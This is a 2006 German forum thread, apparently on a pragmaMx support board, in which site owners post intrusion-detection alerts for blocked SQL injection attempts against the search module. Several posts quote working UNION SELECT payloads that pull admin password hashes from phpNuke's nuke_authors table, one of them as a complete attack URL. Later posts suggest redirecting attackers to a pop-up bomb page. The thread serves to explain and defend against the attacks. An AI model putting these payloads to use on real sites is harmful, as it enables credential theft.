Hack detected

fjuergens · « **am:** 17 April 2006, 20:48:14 »

Hallo zusammen,
was ist das bzw. was fange ich damit an

Handelt sich um eine Domain von einer Freundin.
Sie hat folgende Mail erhalten:

12-04-2006 11:35:21 [Union] Hack detected (0)
user: Gast
admin: Gast
request:
_GET[name] = Search
_POST[query] = test
_POST[type] = comments
_POST[sid] = 0' UNION SELECT pwd FROM nuke_authors/*
Serverinfo:
REMOTE_ADDR: 87.120.5.2
QUERY_STRING: name=Search
REQUEST_URI: /welt/modules.php?name=Search
REMOTE_PORT: 44343
REMOTE_HOST:
HTTP_REFERER:
HTTP_USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7
HTTP_X_FORWARDED_FOR: 87.120.87.178

siteadress: http://www.gabyswelt.info/welt

Danke im voraus

RiotheRat · « **Antwort #1 am:** 17 April 2006, 22:29:37 »

Es hat jemand verrsucht über die Suche das System Deiner Freundin zu hacken. Er wollte gerne das Adminpasswort wissen

Das System hat den Hack erkannt, geblockt und als Resultat diese Mail rausgehauen um darüber zu informieren dass ein gblockter Angriff

stattgefundfen hat.

Du und die Freundin müssen sich also keinen Kopf machen ... ein sinnloser, geblockter Hack ...

RtR

fjuergens · « **Antwort #2 am:** 17 April 2006, 22:34:29 »

Hallo Rio,
Danke für die schnelle Antwort

Puschel · « **Antwort #3 am:** 19 April 2006, 12:36:34 »

Hatte heute ähnlichen Fall und wunderte mich auch erst über die Mail. Aber gibt ja zum Glück die Suche hier

.
Das hier stand drin:

19-04-2006 00:24:49 [Union] Hack detected (0)
user: Gast
admin: Gast
request:
_GET[type] = stories
_GET[topic] =
_GET[category] = 0
_GET[days] = 0
_GET[sid] = 0
_GET[name] = Search
_GET[query] = p0gg0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*
Serverinfo:
REMOTE_ADDR: 85.96.245.201
QUERY_STRING: type=stories&topic=&category=0&days=0&sid=0&name=Search&query=p0gg0nsee%25%27%29+UNION+ALL+SELECT+1%2C2%2Caid%2Cpwd%2C5%2C6%2C7%2C8%2C9%2C10+FROM+nuke_authors%2F*
REQUEST_URI: /modules.php?type=stories&topic=&category=0&days=0&sid=0&name=Search&query=p0gg0nsee%25%27%29+UNION+ALL+SELECT+1%2C2%2Caid%2Cpwd%2C5%2C6%2C7%2C8%2C9%2C10+FROM+nuke_authors%2F*
REMOTE_PORT: 2913
REMOTE_HOST:
HTTP_REFERER: http://www.gamezcheck.de/modules.php?name=Search
HTTP_USER_AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP_X_FORWARDED_FOR:

Ist die "REMOTE_ADDR" die IP von dem, der den Hack versucht hat? Würde es dann was bringen, diese zu sperren? Oder kann man sich das im Prinzip sparen, da er im Pragma auch beim nächsten Mal keinen Erfolg haben wird?

Andi · « **Antwort #4 am:** 19 April 2006, 12:53:29 »

Hi

die ip zu sperren bringt nix, beim nächsten mal hat der ne andere....

Der "Hacker" war ein ahnungsloser doofer scriptkiddie, der den Exploit von waraxe's advisory 1:1 übernommen hat. Manche meinen, wenn sie irgendwo was aufschnappen können sie gleich die halbe Welt hacken....

[waraxe-2006-SA#046] - Critical sql injection in phpNuke 7.5-7.8
http://www.waraxe.us/advisory-46.html

NeMeSiSX2LC · « **Antwort #5 am:** 19 April 2006, 19:49:20 »

Gibt aber leider auch durchaus Seiten wo dieser "hack" greift...

Also keine MX, die armen Nuker....

Andi · « **Antwort #6 am:** 19 April 2006, 23:06:05 »

Trotzdem doofer Scriptkiddie, der nichtmal sieht ob er phpnuke oder sonstwas vor sich hat...

Bekomme die mails ja fast immer in Kopie und zu 95% sind die Angriffe die Standardtexte per cut & paste in die Browserzeile gehackt, oder diese idiotischen Standardhackerformulare wo alle möglichen Nuke-Hacks interaktiv aufgelistet sind. Die Dummköppe machen sich nichtmal die Mühe den richtigen Tabellenprefix zu ermitteln, was ja in Nuke kein Problem ist....

Puschel · « **Antwort #7 am:** 20 April 2006, 19:16:14 »

Naja, aber scheinbar lernt er nicht aus seinen "Fehlern"... Da eben wieder eine Mail kam, vermute ich mal, da ist der gleiche am Werk:

20-04-2006 18:41:25 [Union] Hack detected (0)
user: Gast
admin: Gast
request:
_GET[type] = stories
_GET[topic] =
_GET[category] = 0
_GET[days] = 0
_GET[sid] = 0
_GET[name] = Search
_GET[query] = g0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*
Serverinfo:
REMOTE_ADDR: 85.97.108.5
QUERY_STRING: type=stories&topic=&category=0&days=0&sid=0&name=Search&query=g0nsee%25%27%29+UNION+ALL+SELECT+1%2C2%2Caid%2Cpwd%2C5%2C6%2C7%2C8%2C9%2C10+FROM+nuke_authors%2F*
REQUEST_URI: /modules.php?type=stories&topic=&category=0&days=0&sid=0&name=Search&query=g0nsee%25%27%29+UNION+ALL+SELECT+1%2C2%2Caid%2Cpwd%2C5%2C6%2C7%2C8%2C9%2C10+FROM+nuke_authors%2F*
REMOTE_PORT: 4101
REMOTE_HOST:
HTTP_REFERER: http://www.gamezcheck.de/modules.php?name=Search
HTTP_USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2
HTTP_X_FORWARDED_FOR:

siteadress: http://www.gamezcheck.de

Sieht dem letzten Versuch doch sehr ähnlich

Andi · « **Antwort #8 am:** 20 April 2006, 19:30:15 »

Wie bereits gesagt, diese mails bekomme ich (bzw. das ganze team) zu dutzenden am Tag.
Vergesst es einfach, den Schitt braucht ihr hier nicht zu posten, sonst haben wir bald das Forum damit voll....

Jeder Depp kann das sein, er braucht deine Seite einfach nur mit dieser URL aufrufen:

http://www.deineseite.tld/modules.php?type=stories&topic=&category=0&days=0&sid=0&name=Search&query=g0nsee%25%27%29+UNI0N+ALL+SELECT+1%2C2%2Caid%2Cpwd%2C5%2C6%2C7%2C8%2C9%2C10+FROM+nuke_authors%2F*

Wenn sich das häuft und du die Benachrichtigung nicht erhalten willst, so kannst du das in der /includes/detection/config.php abschalten.

Code: [Auswählen]

// mailadressen, wo die Detection hinversendet werden soll
// weitere Adressen können nach dem gleichen Schema zugefügt werden
// um kein Mail zu versenden, einfach diese Zeilen auskommentieren oder löschen
$conf['sendmail'][] = $GLOBALS['adminmail']; // Standardadminmailadresse, kann auch mit anderem Wert belegt werden :-))
$conf['sendmail'][] = 'ids@pragmamx.org';    // Falls das Entwicklerteam ebenfalls benachrichtigt werden soll

Ich vermute mal, dass die meisten Idioten, die das probieren, garnicht wissen, was sie als Ergebnis bekommen könnten. Selbst wenn, dann bekämen die nur die Adminpasswörter als md5-hash. Das nützt denen bei pragmaMx auch nix, weil die damit keinen Admincookie fälschen können. Den gibt es im pragmaMx nämlich garnicht...

Okimen · « **Antwort #9 am:** 29 April 2006, 17:58:15 »

Hallo Ihr lieben,
ist aber trotz allem sehr schön und sehr beruhigend dies zu lesen. Vor allem wenn man wie ich bzw. meine damals noch php-nuke seiten zweimal gehackt wurden.
Das ganze ist jetzt ca.3 Wochen her, und wirklich verdammt beruhigend. Macht mut neue und weitere Sachen zu probieren, ohne das man Angst haben muss, das irgendein Hacker oder Möchtegernhacker einem das wieder zerstört.

Danke für diese Beruhigung!

VG Dirk

Andi · « **Antwort #10 am:** 29 April 2006, 18:05:11 »

Hi

nunja, das bedeutet aber keine 100%ige Sicherheit, gelle

Okimen · « **Antwort #11 am:** 29 April 2006, 18:51:24 »

Hallo Andi,
gut, aber was ist heute schon 100%ig? Oft reichen ja 98%

VG Dirk

--helmi- · « **Antwort #12 am:** 29 April 2006, 19:13:38 »

Hi Andi..

Zur Zeit häufen sich diese Atacken wieder bei mir..

Und so überlege ich, ob es nicht möglich wäre, diese Jungs auch mal etwas zu ärgern..
oder zumindest zu verwirren: Wäre es möglich bei solchen Angriffen eine bestimmte Seite zu öffnen..?
Meinetwegen in der Art von: Wir kennen Dich: Hier ist deine IP, dein OS, dein Browser, dein "C:\ - Verzeichnis" (soll ja mit JS ganz einfach gehen..!?) .. Jetzt wird Deine Pladde formatiert.. usw..

8)

Wäre sowas (mit wenig Aufwand) möglich..?

---

Andi · « **Antwort #13 am:** 29 April 2006, 19:28:58 »

Moin

meinst du wirklich, dass du mit solchen Spielereien die Jungs beeindrucken kannst?

Wenn ja, kannst du einfach auf eine andere Seite umleiten, indem du die /includes/detection/config.php anpasst:

Code: [Auswählen]

// Weiterleiten auf andere Seite oder leerlassen um mit Fehlermeldung direkt abzubrechen
$conf['redirect'] = 'http://www.google.de/'; #

Standardmässig wird da auf die index.php umgeleitet, da kannst du aber jede x-beliebige Seite einsetzen.
Heheeee, z.B. auf diesen Thread

--helmi- · « **Antwort #14 am:** 30 April 2006, 21:54:21 »

MoinMoin Andi

Zitat

Moin
meinst du wirklich, dass du mit solchen Spielereien die Jungs beeindrucken kannst?

Naja.. manche Kiddies wirds vielleicht beieindrucken..?

Sind ja IMHO nicht alles "Profis" / Freaks.. Denke (hoffe) mal das der Großteil der Atacken von eher unbedarften Kiddies kommt, die irgendwelche Instant-Scripte alle mal der Reihe nach anklicken / probieren..

Danke mal für Deinen Code-Tipp! werds mal verwurschteln!
Wenn dann irgendwelche Häufungen von Panikatacken bei den Kiddies bekannt werden, geb ich hier nochmal Bescheid.. *lol*

Okimen · « **Antwort #15 am:** 30 April 2006, 22:50:24 »

Hallo,
gut "Profis" würde das wohl kaum erschrecken, aber bei den "Kiddis" die da meinen sie könnten die ganze Welt hacken, stelle ich mir das schon komisch vor!

Viel Spaß!

VG Dirk

NeMeSiSX2LC · « **Antwort #16 am:** 01 Mai 2006, 01:25:11 »

Wenn ich diese Meldung so sehe dann ist das doch ne Aktuelle von **** Und es gibt echt Seiten wo das geht (Nuke) Bloss bissel ahnung müsste derjenige doch haben. Sonst kann er mit dem Resultat nix anfangen

Andi · « **Antwort #17 am:** 01 Mai 2006, 02:11:12 »

Klar funktioniert das in phpNuke

Aber etliche Leute haben immer noch nicht kapiert, dass pragmaMx mit nuke genauso viel gemeinsam hat, wie postNuke. Ob die postNuke Jungs auch so unter dieser beschissenen Erblast leiden müssen....

m-t · « **Antwort #18 am:** 01 Mai 2006, 11:17:22 »

Zitat von: Andi am 29 April 2006, 19:28:58

meinst du wirklich, dass du mit solchen Spielereien die Jungs beeindrucken kannst?

Also ich hab bei Nuke immer auf hxxp://www.adatepe.de/ebay

weitergeleitet,

Vorsicht lieber nicht aufrufen! Es öffnen sich ca. 1800 Fenster. Den PC kannst dann neu starten da kommt kein PopUp Blocker mit :-)

Seitdem ich das drinhatte haben sich die Hackversuche in Minutenabständen etwas verringert, beeindrucken kann ich niemand damit das is klar. Aber ein bischen Schadenfreude ist schon dabei.

Apfelkomplott · « **Antwort #19 am:** 18 Mai 2006, 20:08:54 »

Zitat von: m-t am 01 Mai 2006, 11:17:22

Also ich hab bei Nuke immer auf hxxp://www.adatepe.de/ebay

Also, da würde ich doch eher die URL eines Werbepartners eintragen, der per Click/View bezahlt ... ;-)

m-t · « **Antwort #20 am:** 24 Mai 2006, 16:32:04 »

Zitat von: Apfelkomplott am 18 Mai 2006, 20:08:54

Also, da würde ich doch eher die URL eines Werbepartners eintragen, der per Click/View bezahlt ... ;-)

Das war noch bei Nuke, aber die Idee ist toll :-)

schnikemike · « **Antwort #21 am:** 06 August 2006, 23:06:57 »

ist das eigendlich noch ein überbleibsel oder beabsichtigt?

$conf['sendmail'][] = 'ids@pragmamx.org'; // Falls das Entwicklerteam ebenfalls benachrichtigt werden soll

Da kommen ja dann ziug solcher mails bei euch an.

Lg

der_luecke · « **Antwort #22 am:** 06 August 2006, 23:26:26 »

Jupp, wir wollen doch wissen, was versucht wird

und jupp es ist eine Menge los, SPAM ist lächerlich dagegen